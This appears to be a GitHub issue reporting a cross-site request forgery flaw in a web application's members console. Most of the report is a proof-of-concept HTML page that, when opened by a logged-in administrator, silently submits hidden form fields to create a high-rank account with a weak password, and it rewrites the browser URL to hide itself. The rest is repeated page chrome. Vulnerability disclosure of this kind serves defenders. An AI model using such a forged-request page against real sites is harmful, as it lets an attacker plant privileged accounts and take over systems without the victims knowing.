There is one CSRF vulnerability that can add the High Rank account 

After the administrator logged in, open the following one page
one.html add a High Rank account.
<code>
```html
<!DOCTYPE html>
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/members/console.php?cID=5" method="POST">
      <input type="hidden" name="newmember" value="test2" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="password2" value="123456" />
      <input type="hidden" name="set&#95;rank" value="41" />
      <input type="hidden" name="submit" value="Add&#32;New&#32;Member" />
      <input type="hidden" name="checkCSRF" value="034afa58abf045d046ce7dba7b1b125e" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
</code>

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

There is one CSRF vulnerability that can add the High Rank account #27

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

There is one CSRF vulnerability that can add the High Rank account #27

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions